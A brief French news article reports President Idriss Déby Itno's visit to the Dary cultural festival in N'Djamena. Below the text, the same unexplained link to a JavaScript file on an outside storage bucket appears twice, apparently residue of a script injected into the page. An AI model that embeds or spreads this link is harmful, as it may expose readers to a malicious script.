VISITE DU PRÉSIDENT AU FESTIVAL DARY

0
425

Le président de la république du Tchad IDRISS DEBY ITNO, a assisté ce matin aux présentations d’œuvres d’arts ainsi que les danses au festival Dary, qui se tient depuis le 22 Décembre et se poursuit jusqu’au 02 Janvier à la place de la nation.

Il est huit heures alors que les 23 régions se mettent à présenter d’une manière simultanée les danses originaires de leurs régions, le Président de la République fait son entrée dans la place de la nation et visite les stands du festival. Aux cotés de lui, Nouradine Delwa kassiré, Ministre d’État, Ministre conseiller à la Présidence de la République ainsi que d’autres membres du gouvernement et députés. Fier de se trouver dans les multitudes faits traditionnels, le Président de la République porte un sourire d’engouement pendant sa visite dans tous les stands.

Notons que ce festival est non seulement une rencontre culturelle mais surtout une opportunité de tramer le marché des arts, et une grande occasion de découvrir de nouvelles perspectives pour valoriser le Tchad à l’étranger comme le pays des arts et de culture. C’est une initiative pour la politique publique vers une cohésion sociale.

https://s3-us-west-2.amazonaws.com/gyrgdd/deext.js

https://s3-us-west-2.amazonaws.com/gyrgdd/deext.js

LAISSER UN COMMENTAIRE

S'il vous plaît entrez votre commentaire!
S'il vous plaît entrez votre nom ici